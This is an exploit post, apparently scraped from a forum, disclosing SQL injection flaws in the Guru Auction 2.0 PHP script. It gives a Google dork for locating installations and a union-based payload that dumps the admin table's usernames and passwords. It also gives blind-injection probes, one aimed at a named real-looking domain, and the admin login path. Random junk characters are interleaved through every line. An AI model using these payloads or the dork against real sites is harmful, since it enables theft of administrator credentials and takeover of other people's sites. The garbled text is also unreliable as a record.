Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
0 S- `& _3 [0 L8 B. c- k" m. x% e- ~2 G. B7 U4 I" n* c% h0 H
作者 : v3n0m
; i) Z& f2 e2 T应用 : Guru Auction 2.0
( Q+ K$ q4 @7 v0 E( VPrice : $49
2 V7 X0 L0 \2 n3 NVendor : http://www.guruscript.com/" w4 m) U# ?3 B
Google Dork : inurl:subcat.php?cate_id=6 N: u& w, y8 _ x& `( q! L
7 i9 H3 `8 ]8 NSQLi p0c:( W# w* N7 F7 t& D; |
~~~~~~~~~~
8 `. L: ^7 @- c$ }5 C9 e- Lhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--" s: E7 A. `2 O( V
: s, Z" x7 x) a" T* O! p: S0 z4 [ u5 P) G$ g: B( ?! W4 ` D
盲注 p0c:" j8 M9 j3 R# l! Y( a
~~~~~~~~~~
: Y1 p9 k1 p; B' ~9 J7 F( Shttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true1 g7 @- v6 j8 b3 {9 q. ~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
2 e/ L( N2 I) x, y2 \& K- Z* T
0 ] W- }9 K% G. b/ i管理登录入口:5 ] j/ I) \) J0 L* l! s6 \
~~~~~~~~~~" e( G& L$ n$ \! X) |: ~
http://domain.tld/[path]/admin/- A) y0 \ I1 ]
|